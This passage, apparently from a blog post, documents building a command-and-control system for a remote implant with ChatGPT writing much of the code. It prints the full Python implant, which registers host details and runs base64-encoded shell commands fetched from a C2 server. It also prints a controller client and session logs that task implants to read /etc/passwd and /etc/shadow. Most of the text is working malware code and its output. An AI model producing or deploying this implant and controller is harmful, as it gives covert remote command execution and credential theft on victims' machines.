"task_executed_time": null,
"task_status": 1,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:52:10.036675",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 3,
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:54:48.561148",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 1,
"task_uuid": "be33a894-00e0-4003-9053-a12c2cca330b"
}
]
}
Submit a task result!
$ curl -s http://127.0.0.1:5000/submit_result -d "task_uuid=be33a894-00e0-4003-9053-a12c2cca330b&implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d&task_result=loltest"
{"message":"Task result submitted successfully."}
List tasks again to see if it has been updated.
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
"task_executed_time": null,
"task_status": 1,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:52:10.036675",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 3,
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:54:48.561148",
"task_data": "bHMgLwo=",
"task_executed_time": "2023-05-02 09:56:45.010077",
"task_status": 2,
"task_uuid": "be33a894-00e0-4003-9053-a12c2cca330b"
}
]
}
Now we go check to see if there are task results.
$ curl -s http://127.0.0.1:5000/get_output?task_uuid=be33a894-00e0-4003-9053-a12c2cca330b | jq
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:54:48.561148",
"task_data": "bHMgLwo=",
"task_executed_time": "2023-05-02 09:56:45.010077",
"task_result": "loltest",
"task_status": 2,
"task_uuid": "be33a894-00e0-4003-9053-a12c2cca330b"
}
Finally, we list implants again to verify its "last seen" time was updated.
$ curl -s http://127.0.0.1:5000/list_implants | jq
{
"implants": [
{
"first_seen": "2023-05-02 09:51:10.416314",
"implant_build_id": "81312ee0edbffd6eacabe62905325051",
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"implant_uname": "TGludXggZGViaWFuIDUuMTAuMC05LWFtZDY0ICMxIFNNUCBEZWJpYW4gNS4xMC43MC0xICgyMDIxLTA5LTMwKSB4ODZfNjQgR05VL0xpbnV4Cg==",
"implant_user": "dWlkPTEwMDEodXNlcikgZ2lkPTEwMDEodXNlcikgZ3JvdXBzPTEwMDEodXNlciksMjcoc3VkbykK",
"last_seen": "2023-05-02 09:56:45.005441"
}
]
}
$
All in all, pretty much all the intended functionality is working just fine on the server side of the fence. I'm fairly confident our glorified shit-tier message queue is doing its job.
Making ChatGPT Build The Reference Implant in Python.
I guess the prompt and output will go first.
In Python, write a program that does the following:
Reads the contents of the /etc/machine-id file, removes any trailing newline, and stores it as a variable named "implant_machine_id"
Has an empty variable named "implant_build_id" that will contain a random 32 character string.
Executes the shell command "id", base64 encodes the output, and stores it as a variable named "implant_user".
Executes the shell command "uname -a", base64 encodes the output, and stores it as a variable named "implant_uname".
On launch, sends a HTTP POST request to the URL "http://127.0.0.1:5000/register" containing the POST parameters "implant_machine_id", "implant_build_id", "implant_user", and "implant_uname", with their POST data set to the contents of the variables which have the same name.
It should then enter a while loop, in which it does the following steps:
1. Make a HTTP POST request to http://127.0.0.1:5000/get_task, sending its implant_machine_id.
2. If the response is a 404, sleep for 60 seconds and break.
3. If the response code is 200, extract the task_uuid and task_data from the JSON response.
4. base64 decode the task_data, execute it as a shell command, and capture the output.
5. base64 encode the output of the shell command, storing this as task_result.
6. Send a HTTP POST request to http://127.0.0.1:5000/submit_result containing the implant_machine_id, task_uuid, and task_result.
7. Sleep for 60 seconds.
```python
import requests
import subprocess
import base64
import random
import string
import json
import time

# Read implant machine ID from file and remove newline
with open('/etc/machine-id', 'r') as f:
    implant_machine_id = f.read().rstrip()

# Generate random 32-character string for implant build ID
implant_build_id = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32))

# Execute shell command "id" and base64 encode output
implant_user = subprocess.check_output(['id']).strip()
implant_user = base64.b64encode(implant_user).decode('utf-8')

# Execute shell command "uname -a" and base64 encode output
implant_uname = subprocess.check_output(['uname', '-a']).strip()
implant_uname = base64.b64encode(implant_uname).decode('utf-8')

# Send HTTP POST request to register implant with server
register_data = {
    'implant_machine_id': implant_machine_id,
    'implant_build_id': implant_build_id,
    'implant_user': implant_user,
    'implant_uname': implant_uname
}
register_response = requests.post('http://127.0.0.1:5000/register', data=register_data)
if register_response.status_code != 200:
    print('Registration failed')
    exit()

# Enter while loop to retrieve and execute tasks
while True:
    # Send HTTP POST request to get task
    get_task_data = {'implant_machine_id': implant_machine_id}
    get_task_response = requests.post('http://127.0.0.1:5000/get_task', data=get_task_data)

    # Check response code
    if get_task_response.status_code == 404:
        # If task not found, sleep for 60 seconds and try again
        time.sleep(60)
        continue
    elif get_task_response.status_code != 200:
        # If unexpected response code, print error and exit
        print('Error getting task:', get_task_response.status_code)
        exit()

    # Extract task UUID and task data from JSON response
    task_json = json.loads(get_task_response.text)
    task_uuid = task_json['task_uuid']
    task_data = task_json['task_data']

    # Decode task data and execute as shell command
    task_command = base64.b64decode(task_data).decode('utf-8')
    task_output = subprocess.check_output(task_command, shell=True).strip()

    # Base64 encode output and submit task result to server
    task_result = base64.b64encode(task_output).decode('utf-8')
    submit_result_data = {
        'implant_machine_id': implant_machine_id,
        'task_uuid': task_uuid,
        'task_result': task_result
    }
    submit_result_response = requests.post('http://127.0.0.1:5000/submit_result', data=submit_result_data)

    # Sleep for 60 seconds before getting next task
    time.sleep(60)
```
End-to-end testing with the implant, and "curl".
You know, somewhat surprisingly, I just had to replace the implant_build_id part as GPT was trying to be too clever for its own good.
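Specifically, GPT generated a fresh random build ID on every launch, which rather defeats the point of a build ID. The hand-fix was just pinning the value (this one is from my test build; in practice it gets baked in per "build"):

```python
# Hardcoded per "build" instead of regenerated each run, so the same
# payload always reports the same build ID.
implant_build_id = "2daf0aa5c59804746a4314d3284d66ed"
```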
Listing implants...
$ curl -s http://127.0.0.1:5000/list_implants | jq
{
"implants": [
{
"first_seen": "2023-05-02 11:15:10.217162",
"implant_build_id": "2daf0aa5c59804746a4314d3284d66ed",
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"implant_uname": "SNIP",
"implant_user": "SNIP",
"last_seen": "2023-05-02 11:17:10.361762"
}
]
}
$
Adding a task...
$ curl -s http://127.0.0.1:5000/submit_task -d 'implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d&task_data=bHMgLwo='
{"implant_machine_id":"79ef32b5ea31cbff9bbd405c61a6440d","task_uuid":"1395ea71-d201-484e-a1b1-194f0bc8d250"}
Listing tasks, suddenly it's done!
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 11:16:21.176785",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "1395ea71-d201-484e-a1b1-194f0bc8d250"
}
]
}
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 11:16:21.176785",
"task_data": "bHMgLwo=",
"task_executed_time": "2023-05-02 11:17:10.364539",
"task_status": 2,
"task_uuid": "1395ea71-d201-484e-a1b1-194f0bc8d250"
}
]
}
Getting task output...
$ curl -s http://127.0.0.1:5000/get_output?task_uuid=1395ea71-d201-484e-a1b1-194f0bc8d250 | jq .task_result | sed s/\"//g | base64 -d
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lol
lol.bin
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
test.txt
tmp
usr
var
vmlinuz
vmlinuz.old$
At this point, we did have to fix one bug I found. In the database, the `implant_machine_id` was not a primary key, so it was possible to have multiple identical implants.
This is no fucking good at all, so I made that column a primary key, and that fixes the issue.
HOWEVER, it means an implant can only register once, which is a problem if you are aiming for persistence. We will have to add some fixes for this on the client and server side later - e.g. a special response saying "already registered".
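One likely server-side fix, sketched below but not wired in yet: use SQLite's upsert support (3.24+) in the register endpoint, so a re-registering implant refreshes its last_seen instead of blowing up on the primary key.

```python
# Inside register(): re-registration updates last_seen rather than
# violating the implant_machine_id primary key. Not implemented yet.
c.execute("""INSERT INTO implants
             (implant_machine_id, implant_build_id, implant_uname,
              implant_user, first_seen, last_seen)
             VALUES (?, ?, ?, ?, ?, ?)
             ON CONFLICT(implant_machine_id)
             DO UPDATE SET last_seen = excluded.last_seen""",
          (implant_machine_id, implant_build_id, implant_uname,
           implant_user, current_time, current_time))
```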
For what it's worth though - at this time we do have a fully working implant and can control it via HTTP requests...
Making ChatGPT Build The Reference Controller Client.
This required some thinking. I personally don't really like prompt-based clients for... Anything, really. I can deal with it for tools like Metasploit, but I don't actually like the UI that much, especially for asynchronous implants.
I much prefer a command line tool that takes arguments via argparse or similar, and outputs text.
So I decided that our initial "Controller Client" would be a simple command line tool that lets us perform a number of tasks.
Most of this shit is going to be argparse boilerplate (that, years later, I still have to look up every time), so GPT is actually perfect for this.
So let's list the arguments/options we actually need.
- `--list-agents`: Lists implants, outputs information about them in some kind of format that doesn't hurt the eyes too badly.
- `--agent MACHINE_ID`: Specifies the machine ID of an agent for other commands.
- `--get-tasks`: Get tasks - either all tasks, or just the ones for a specific agent, if the `--agent` flag is set.
- `--submit-task TASK_DATA`: Submits a task (a shell command). Requires `--agent` to be set, returns a TASK_UUID.
- `--task TASK_UUID`: A specific task UUID.
- `--get-output`: Get the output for a task. Requires `--task` to be set.
- `--cancel-task`: Cancels a task (if not already running). Requires `--task` to be set.
The first order of business was to get it to just implement a skeleton, and the "list agents" feature.
I would like to write a simple command line client in Python for an HTTP API, using argparse and requests libraries.
It should accept the following arguments:
--list-agents (no args)
--agent AGENT_ID
--get-tasks (no args)
--submit-task TASK_DATA
--task TASK_UUID
--get-output (no args)
--cancel (no args)
the --list-agents function should make a HTTP GET request to http://127.0.0.1:5000/list_implants, convert the JSON output to a table, base64 decode the "implant_uname" and "implant_user" fields, and print the table to the console.
This went about as well as could be expected. The output is pretty "big" and even GPT couldn't make it look pretty, so I decided fuck it, it can emit a tab-separated values file for scripting. That, too, was completely unreadable by default.
```python
import argparse
import base64
import json
import requests
from prettytable import PrettyTable

API_URL = 'http://127.0.0.1:5000'

def list_agents():
    url = f'{API_URL}/list_implants'
    response = requests.get(url)
    if response.status_code == 200:
        agents = json.loads(response.text)
        table = PrettyTable()
        table.field_names = ['ID', 'Implant Uname', 'Implant User']
        for agent in agents:
            table.add_row([agent['id'], base64.b64decode(agent['implant_uname']).decode(),
                           base64.b64decode(agent['implant_user']).decode()])
        print(table)
    else:
        print(f'Error: {response.status_code}')

def get_tasks(agent_id):
    pass

def submit_task(task_data):
    pass

def get_output(task_uuid):
    pass

def cancel():
    pass

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='HTTP API client')
    parser.add_argument('--list-agents', action='store_true', help='List all agents')
    parser.add_argument('--agent', dest='agent_id', help='Agent ID')
    parser.add_argument('--get-tasks', action='store_true', help='Get tasks for the specified agent')
    parser.add_argument('--submit-task', dest='task_data', help='Submit a task')
    parser.add_argument('--task', dest='task_uuid', help='Task UUID')
    parser.add_argument('--get-output', action='store_true', help='Get output for the specified task')
    parser.add_argument('--cancel', action='store_true', help='Cancel the specified task')
    args = parser.parse_args()

    if args.list_agents:
        list_agents()
    elif args.agent_id:
        get_tasks(args.agent_id)
    elif args.get_tasks:
        get_tasks()
    elif args.task_data:
        submit_task(args.task_data)
    elif args.task_uuid:
        get_output(args.task_uuid)
    elif args.get_output:
        get_output()
    elif args.cancel:
        cancel()
    else:
        parser.print_help()
```
I ended up just writing my own output format, which is also ugly, but at least I can read it.
```python
def list_agents():
    url = f'{API_URL}/list_implants'
    response = requests.get(url)
    if response.status_code == 200:
        agents = json.loads(response.text)['implants']
        print('='*20)
        for agent in agents:
            print("Machine ID: " + agent['implant_machine_id'])
            print("uname -a: " + base64.b64decode(agent['implant_uname']).decode())
            print("user id: " + base64.b64decode(agent['implant_user']).decode())
            print("First Seen: " + agent['first_seen'])
            print("Last Seen: " + agent['last_seen'])
            print("Build ID: " + agent['implant_build_id'])
            print('='*20)
    else:
        print(f'Error: {response.status_code}')
```
$ python3 control.py --list-agents
====================
Machine ID: 79ef32b5ea31cbff9bbd405c61a6440d
uname -a: Linux debian 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64 GNU/Linux
user id: uid=1001(user) gid=1001(user) groups=1001(user),27(sudo)
First Seen: 2023-05-02 11:15:10.217162
Last Seen: 2023-05-02 15:14:32.824819
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
We will probably have to repeat this (making our own output format) for every other command, to be honest. That is fine.
Handling the problem of "get_tasks" having an optional "agent" argument supplied by the "agent" flag is something I could look up in the argparse documentation, but I can also reliably assume someone fed that documentation to ChatGPT, so it can figure it out for me already.
Task list output is going to be problematic, I think I will have it (with no agent specified) just emit all tasks in order of time, with the same format style as the list_agents. I'll probably also have to come up with a way to convert the status-integers into human readable words. Not hard.
Anyway, here is the prompt, and its output.
Ok, can you now implement the get_tasks function? Optionally passing it an implant_machine_id from the --agent flag if that flag is set?
The get_tasks function should send a HTTP GET request to the http://127.0.0.1:5000/list_tasks endpoint.
If an implant_machine_id variable is set, this can be passed as a GET parameter called machine_id.
The JSON output of this endpoint looks like the following example:
```json
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:52:10.036675",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
}
]
}
```
The output from this command should print each tasks data out.
It should convert the "task_status" integer into a text using the following lookup:
0 = Task Pending
1 = Task In Progress
2 = Task Executed
3 = Task Cancelled
Sure, here's a function that should do what you're asking for:
```python
def get_tasks(args):
params = {}
if args.agent:
params['machine_id'] = args.agent
url = f'{API_URL}/list_tasks'
response = requests.get(url, params=params)
if response.status_code == 200:
tasks = json.loads(response.text)['tasks']
for task in tasks:
task_status = {
0: 'Task Pending',
1: 'Task In Progress',
2: 'Task Executed',
3: 'Task Cancelled'
}[task['task_status']]
task_data = base64.b64decode(task['task_data']).decode()
print(f'Task UUID: {task["task_uuid"]}')
print(f'Created Time: {task["task_created_time"]}')
print(f'Executed Time: {task["task_executed_time"]}')
print(f'Status: {task_status}')
print(f'Data: {task_data}\n')
else:
print(f'Error: {response.status_code}')
```
This function takes the parsed command-line arguments as its argument (`args`), and checks if the `--agent` flag was set. If it was, it adds the `machine_id` parameter to the GET request. The response from the API is then parsed as JSON, and each task is printed to the console with the decoded task data and a human-readable status string based on the task status lookup.
You can run this function by calling it with the parsed command-line arguments like so:
```python
if args.get_tasks:
get_tasks(args)
```
If you run the script with the `--get-tasks` flag, it will call the `get_tasks()` function with the parsed arguments. If the `--agent` flag was set, it will filter the tasks by the specified agent ID. The output of this function will print each task's data as described in the prompt.
This required minimal modifications on my test instance (which only had one task anyway). Still not SUPER happy with the output, but whatever.
$ python control.py --get-tasks
====================
Machine ID: 79ef32b5ea31cbff9bbd405c61a6440d
Task UUID: 1395ea71-d201-484e-a1b1-194f0bc8d250
Created Time: 2023-05-02 11:16:21.176785
Executed Time: 2023-05-02 11:17:10.364539
Status: Task Executed
Data: ls /
====================
$ python control.py --get-tasks --agent 79ef32b5ea31cbff9bbd405c61a6440d
====================
Machine ID: 79ef32b5ea31cbff9bbd405c61a6440d
Task UUID: 1395ea71-d201-484e-a1b1-194f0bc8d250
Created Time: 2023-05-02 11:16:21.176785
Executed Time: 2023-05-02 11:17:10.364539
Status: Task Executed
Data: ls /
====================
The "submit_task" function will have a mandatory requirement for the agent parameter to be set - another thing that argparse can probably resolve for us here.
One issue I foresee with submit_task is "bad characters" like quotes. I think I will just leave it in such a way that the user can handle that with shell quoting for now - it gets encoded before it's submitted anyway.
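For example, something like this once the function exists (made-up task, obviously) - the single quotes keep the shell from eating anything before it gets base64'd:
$ python control.py --agent 79ef32b5ea31cbff9bbd405c61a6440d --submit-task 'echo "lol" > /tmp/lol.txt'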
The prompt was as follows:
Ok. Now can we implement `submit_task`? This function should require the use of the `agent` parameter to define an implant_machine_id, and throw an error if that parameter is missing.
The 'submit-task' flag should accept one argument, which is mandatory, the text of the task to send, stored as task_data_plain.
It should send a HTTP POST request to http://127.0.0.1:5000/submit_task with the implant_machine_id parameter set to the implant_machine_id, and the task_data paramater containing the task_data_plain encoded as base64.
This will result in a JSON response like the following:
```json
{"implant_machine_id":"79ef32b5ea31cbff9bbd405c61a6440d","task_uuid":"1395ea71-d201-484e-a1b1-194f0bc8d250"}
```
Assuming all succeeds, the function should print out the implant_machine_id and task_uuid.
Its output here was not terrible, but also was incorrect. I didn't bother correcting it, as it took less time for me to fix by hand.
Certainly! Here's the implementation for the `submit_task` function:
```python
import base64
import requests

def submit_task(args):
    if not args.agent:
        raise ValueError("agent is required to submit a task")
    task_data_plain = args.submit_task
    url = "http://127.0.0.1:5000/submit_task"
    params = {"implant_machine_id": args.agent}
    headers = {"Content-Type": "application/json"}
    task_data = base64.b64encode(task_data_plain.encode("utf-8")).decode("utf-8")
    data = {"task_data": task_data}
    response = requests.post(url, params=params, headers=headers, json=data)
    response.raise_for_status()
    json_response = response.json()
    implant_machine_id = json_response["implant_machine_id"]
    task_uuid = json_response["task_uuid"]
    print(f"Task submitted with implant_machine_id: {implant_machine_id} and task_uuid: {task_uuid}")
```
You can call this function using the `--submit-task` flag, like this:
```
python my_script.py --agent 79ef32b5ea31cbff9bbd405c61a6440d --submit-task "ls"
```
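For what it's worth, my hand-fixed version ended up looking roughly like the sketch below. This is a reconstruction rather than the exact code - in particular, I'm assuming here that the Flask endpoint reads both implant_machine_id and task_data from the query string; adjust to however the server actually parses it.
```python
import base64
import requests

def submit_task(args):
    # Sketch of the hand-fixed version; how the server expects to receive
    # these values is an assumption here, not confirmed against it.
    if not args.agent:
        raise ValueError("agent is required to submit a task")
    task_data = base64.b64encode(args.submit_task.encode("utf-8")).decode("utf-8")
    params = {"implant_machine_id": args.agent, "task_data": task_data}
    response = requests.post("http://127.0.0.1:5000/submit_task", params=params)
    response.raise_for_status()
    json_response = response.json()
    print(f"Task submitted with implant_machine_id: {json_response['implant_machine_id']} "
          f"and task_uuid: {json_response['task_uuid']}")
```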
get_output and cancel both have a mandatory task_uuid requirement. As for output, cancel is easy - it just returns a "cancelled" or a "could not cancel, sorry".
Here is the prompt for cancelling. At this point, I was a bit tired.
Ok, now we need the "cancel" function. This should require a mandatory argument of task_uuid. If task_uuid is not set, it should exit with an error message.
The cancel function sends an HTTP GET request to an endpoint named /cancel_task on http://127.0.0.1:5000, with the GET parameter of task_uuid containing the task_uuid to be cancelled.
If the response is a 404, return an error of "Task does not exist!".
If the response is a 200, and the JSON body contains the string "error", print that the task could not be cancelled.
If the response is a 200, and the JSON body contains the string "success". print that the task was cancelled successfully.
And the output... It will need some cleaning by hand.
Sure! Here's the implementation of the `cancel` function:
```python
import requests
import argparse
def cancel(args):
    if not args.task_uuid:
        print("Error: task_uuid is required!")
        return
    params = {'task_uuid': args.task_uuid}
    response = requests.get('http://127.0.0.1:5000/cancel_task', params=params)
    if response.status_code == 404:
        print("Task does not exist!")
    elif response.status_code == 200:
        response_json = response.json()
        if "error" in response_json:
            print("Error: Could not cancel task!")
        elif "success" in response_json:
            print("Task was cancelled successfully!")
    else:
        print("Error: Unexpected response from server.")
```
The `cancel` function takes an argument `args` which contains the parsed command line arguments, including `task_uuid` as a required argument. The function checks if `task_uuid` is set and returns an error message if it is not.
The function then sets the `task_uuid` parameter in a GET request to the `/cancel_task` endpoint and sends the request to the server. If the response status code is 404, it prints an error message that the task does not exist. If the status code is 200, the function parses the JSON response and checks if the "error" or "success" strings are present in the response. Based on the presence of these strings, it prints an appropriate message. If the response status code is not 404 or 200, the function prints an error message indicating that an unexpected response was received from the server.
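One thing to watch in GPT's interpretation: `"error" in response_json` tests the dict's *keys*, not the body text. My prompt said the JSON body "contains the string", so if the server returns something like `{"status": "error: already executed"}` (an assumed shape, for illustration), the key check silently misses it. A substring check against the raw body is closer to what I actually asked for:
```python
# Substring checks against the raw response body, rather than dict-key
# membership tests; which is right depends on the server's JSON shape.
if "error" in response.text:
    print("Error: Could not cancel task!")
elif "success" in response.text:
    print("Task was cancelled successfully!")
else:
    print("Error: Unexpected response from server.")
```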
For the output of get_output, I think the best way is to print the machine ID, the submit date, the execution date, the task that was submitted, some kind of separator, and then the output itself.
Prompt.
Finally, we need the get_output function. Again, this function should throw an error if the task_uuid argument is not provided.
get_output sends a HTTP GET request to the endpoint http://127.0.0.1:5000/get_output with the task_uuid parameter set to the task_uuid.
An example JSON response is as follows:
```json
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 11:16:21.176785",
"task_data": "bHMgLwo=",
"task_executed_time": "2023-05-02 11:17:10.364539",
"task_result": "blah",
"task_status": 2,
"task_uuid": "1395ea71-d201-484e-a1b1-194f0bc8d250"
}
```
The function should print the implant_machine_id as Machine ID.
The function should print the task_uuid as Task UUID.
The function should base64 decode the task_data and print it as "Task Data".
The function should print the task_created_time and task_executed_time as Task Created Time and Task Executed Time respectively.
The function should finally print the base64 decoded contents of the task_result field, followed by two newlines.
And the result, which isn't terrible...
Sure! Here's the implementation for the `get_output` function:
```python
import requests
import base64
def get_output(task_uuid):
    if not task_uuid:
        raise ValueError("Task UUID must be provided.")
    url = f"http://127.0.0.1:5000/get_output?task_uuid={task_uuid}"
    response = requests.get(url)
    if response.status_code == 404:
        print("Task does not exist!")
        return
    elif response.status_code == 200:
        data = response.json()
        print("Machine ID:", data["implant_machine_id"])
        print("Task UUID:", data["task_uuid"])
        task_data = base64.b64decode(data["task_data"]).decode("utf-8")
        print("Task Data:", task_data)
        print("Task Created Time:", data["task_created_time"])
        print("Task Executed Time:", data["task_executed_time"])
        task_result = base64.b64decode(data["task_result"]).decode("utf-8")
        print("Task Result:")
        print(task_result)
        print()
        if "error" in data:
            print("Task could not be retrieved.")
            return
        else:
            print("Task retrieved successfully.")
            return
    else:
        print("Error occurred during request.")
        return
```
The function first checks that the `task_uuid` argument is provided, raising a `ValueError` if not.
Then, it builds the URL with the provided `task_uuid` parameter and makes a GET request to the `/get_output` endpoint on the local server.
If the response status code is 404, it prints "Task does not exist!" and returns.
If the response status code is 200, it prints the Machine ID and Task UUID fields, and base64 decodes the Task Data and Task Result fields, printing them out as well. Finally, it checks for the presence of the "error" field in the response JSON. If it's present, it prints "Task could not be retrieved." If not, it prints "Task retrieved successfully."
If the response status code is something other than 404 or 200, it simply prints "Error occurred during request." and returns.
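One hand-fix worth noting: unlike the other handlers, GPT wrote `get_output` to take the UUID directly instead of the parsed `args` object, so the dispatch glue has to paper over the mismatch. Something like this, assuming the argparse parser is in scope and flag names matching the session below:
```python
# get_output takes the raw UUID rather than args, unlike the other
# handlers, so the dispatcher unpacks the flag for it.
if args.get_output:
    if not args.task:
        parser.error('--get-output requires --task')
    get_output(args.task)
```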
As this goes on, I find myself less and less satisfied with the "client", and will doubtless end up writing a few different variations. I also find myself less satisfied with the API, wanting more options for filtering output on the server side, making specific queries, etc. But that is all a problem for later me to deal with.
I also realised a massive oversight: the database doesn't record the implants' external/internal IP addresses.
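Fixing that is mostly a one-liner on the registration endpoint plus a schema change. A rough sketch of the Flask side - the route name and storage step here are placeholders, not the actual server code from earlier in the post:
```python
from flask import Flask, request

app = Flask(__name__)

@app.route('/register', methods=['POST'])
def register():
    # request.remote_addr is the peer's address as the C&C sees it; behind
    # a reverse proxy the real client IP usually arrives in X-Forwarded-For.
    external_ip = request.headers.get('X-Forwarded-For', request.remote_addr)
    # The internal IP can't be observed server-side - the implant would
    # have to collect it locally and include it in the registration data.
    # ...store external_ip alongside the rest of the registration row...
    return {'status': 'ok'}
```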
Finally, after some hand-polishing to fix a number of bugs, we can run an end-to-end test of the client software, which is frankly kind of alright for our purposes right now. We tested it with three "implanted hosts". Here is the session.
$ python control.py --list-agents
====================
Machine ID: b74deeb2d0f0425199a8e2f562166824
uname -a: Linux cowrie-001 5.19.0-29-generic #30-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 4 12:14:09 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:57:44.696832
Last Seen: 2023-05-07 11:57:45.250099
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
$ python control.py --list-agents
====================
Machine ID: b74deeb2d0f0425199a8e2f562166824
uname -a: Linux cowrie-001 5.19.0-29-generic #30-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 4 12:14:09 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:57:44.696832
Last Seen: 2023-05-07 11:57:45.250099
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
Machine ID: 64db882066b74310abc208605a0723a6
uname -a: Linux cowrie-003 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:58:09.030243
Last Seen: 2023-05-07 11:58:09.057521
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
uname -a: Linux cowrie-002 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:58:21.157459
Last Seen: 2023-05-07 11:58:21.317397
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
#### ok, now lets make some work for the bots.
$ python control.py --agent b74deeb2d0f0425199a8e2f562166824 --submit-task 'ls /'
Task submitted with implant_machine_id: b74deeb2d0f0425199a8e2f562166824 and task_uuid: 95750291-da77-4976-aa5a-4b958c18d50a
$ python control.py --agent 64db882066b74310abc208605a0723a6 --submit-task 'cat /etc/passwd'
Task submitted with implant_machine_id: 64db882066b74310abc208605a0723a6 and task_uuid: b183bdce-f823-459a-9a3b-37aa0fadd93f
$ python control.py --agent 0119f1ca03684159ae9396a8d3358dd4 --submit-task 'cat /proc/version'
Task submitted with implant_machine_id: 0119f1ca03684159ae9396a8d3358dd4 and task_uuid: 46a58a37-0aac-4b43-8112-b752904bdc1e
$ python control.py --agent 0119f1ca03684159ae9396a8d3358dd4 --submit-task 'cat /proc/self/cmdline'
Task submitted with implant_machine_id: 0119f1ca03684159ae9396a8d3358dd4 and task_uuid: 1c4196a2-c02c-437c-846d-b65cf4ab8a45
$ python control.py --agent 0119f1ca03684159ae9396a8d3358dd4 --submit-task 'grep bin /etc/shadow'
Task submitted with implant_machine_id: 0119f1ca03684159ae9396a8d3358dd4 and task_uuid: 5a243cbb-1f99-404e-bb40-8b8759a772ee
### lets list the jobs...
$ python control.py --get-tasks
Machine ID: b74deeb2d0f0425199a8e2f562166824
Task UUID: 95750291-da77-4976-aa5a-4b958c18d50a
Created Time: 2023-05-07 11:59:53.352064
Executed Time: 2023-05-07 12:00:47.671617
Status: Task Executed
Data: ls /
====================
Machine ID: 64db882066b74310abc208605a0723a6
Task UUID: b183bdce-f823-459a-9a3b-37aa0fadd93f
Created Time: 2023-05-07 12:00:14.125102
Executed Time: None
Status: Task Pending
Data: cat /etc/passwd
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 46a58a37-0aac-4b43-8112-b752904bdc1e
Created Time: 2023-05-07 12:00:36.898891
Executed Time: None
Status: Task Pending
Data: cat /proc/version
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 1c4196a2-c02c-437c-846d-b65cf4ab8a45
Created Time: 2023-05-07 12:00:45.387467
Executed Time: None
Status: Task Pending
Data: cat /proc/self/cmdline
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 5a243cbb-1f99-404e-bb40-8b8759a772ee
Created Time: 2023-05-07 12:00:55.044400
Executed Time: None
Status: Task Pending
Data: grep bin /etc/shadow
====================
### lets cancel a job and see what happens.
$ python control.py --task 5a243cbb-1f99-404e-bb40-8b8759a772ee --cancel
$ python control.py --get-tasks
Machine ID: b74deeb2d0f0425199a8e2f562166824
Task UUID: 95750291-da77-4976-aa5a-4b958c18d50a
Created Time: 2023-05-07 11:59:53.352064
Executed Time: 2023-05-07 12:00:47.671617
Status: Task Executed
Data: ls /
====================
Machine ID: 64db882066b74310abc208605a0723a6
Task UUID: b183bdce-f823-459a-9a3b-37aa0fadd93f
Created Time: 2023-05-07 12:00:14.125102
